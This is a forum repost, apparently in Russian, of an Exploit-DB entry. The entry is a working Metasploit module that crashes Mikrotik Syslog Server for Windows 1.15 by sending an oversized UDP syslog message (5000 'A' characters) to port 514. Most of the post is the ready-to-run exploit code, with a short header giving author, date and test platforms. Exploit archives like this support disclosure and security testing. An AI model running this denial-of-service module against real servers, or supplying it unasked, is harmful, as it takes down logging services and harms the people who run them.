Exploit Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24968
Проверка EDB
  1. Пройдено
Автор
XIS_ONE
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2013-04-22
Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)
Код:
# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS 
# Date: 19.04.2013
# Exploit Author: xis_one@STM Solutions 
# Vendor Homepage:  www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013) 
# Tested on: Windows XP SP3, Windows 7 SP1 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Udp
	include Msf::Auxiliary::Dos

	def initialize
		super(
			'Name'        => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
			'Description' => %q{
					This module triggers the windows socket error WSAEMSGSIZE (message to long)
                                        in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
                                        The long syslog message overwrite the allocated buffer space causing the socket error.
                                          
			},
			'Author'      => 'xis_one@STM Solutions',
			'License'     => MSF_LICENSE,
			'DisclosureDate' => 'Apr 19 2013')

		register_options(
			[
				Opt::RPORT(514)
			])
	end

	def run
		connect_udp
		pkt = "<0>" + "Apr19 " +  "10.0.0.2 " + "badass" + ": " + "A"*5000
		print_status("Crashing the remote Mikrotik syslog server #{rhost}")
		udp_sock.put(pkt)
		disconnect_udp
	end
end
 
Источник
www.exploit-db.com

Похожие темы